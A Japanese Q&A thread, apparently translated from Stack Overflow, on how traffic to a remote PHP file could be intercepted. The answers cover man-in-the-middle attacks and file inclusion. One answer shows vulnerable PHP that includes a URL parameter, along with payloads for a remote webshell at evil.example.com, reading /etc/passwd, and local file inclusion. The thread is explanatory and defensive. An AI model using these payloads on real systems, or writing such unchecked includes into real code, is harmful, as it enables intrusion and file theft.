-1

私はそれがこの質問で言及されているのを見ます:

リソースとしてリモートphpファイルを含める

では、送信/受信されているデータを誰かがどのように「傍受」(および変更)できるのでしょうか。(その質問では、fopenで読み取られたリモートPHPファイルです)

4

2 に答える 2

2

中間者攻撃に関するウィキペディアの記事を読むことをお勧めします。

PeeHaaが指摘したように、HTTPSを使用してHTTPストリームをSSL/TLSで暗号化できます。

MITM攻撃は、HTTP固有の問題ではありません。この問題は、信頼できないネットワークを流れるすべての通信に影響します。

于 2012-07-28T16:45:21.523 に答える
1

ウィキペディアからのこの例は、悪影響を認識している可能性があります。

<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>

  1. COLOR = http://evil.example.com/webshel​​l.txt-悪意のあるコードを含むリモートでホストされているファイルを挿入します

  2. COLOR = / etc/passwd-攻撃者がUNIXシステムのディレクトリトラバーサルでpasswdファイルの内容を読み取ることができるようにします

  3. /vulnerable.php?COLOR=C:\ftp\upload\exploit-すでにアップロードされているexploit.phpというファイルからコードを実行します(ローカルファイルインクルードの脆弱性)

これらの例から、潜んでいる危険がより明確になることを願っています。

これらの攻撃を軽減するには、「スクリプト外の信頼できないデータには検証が必要です」。

于 2012-07-28T16:55:15.223 に答える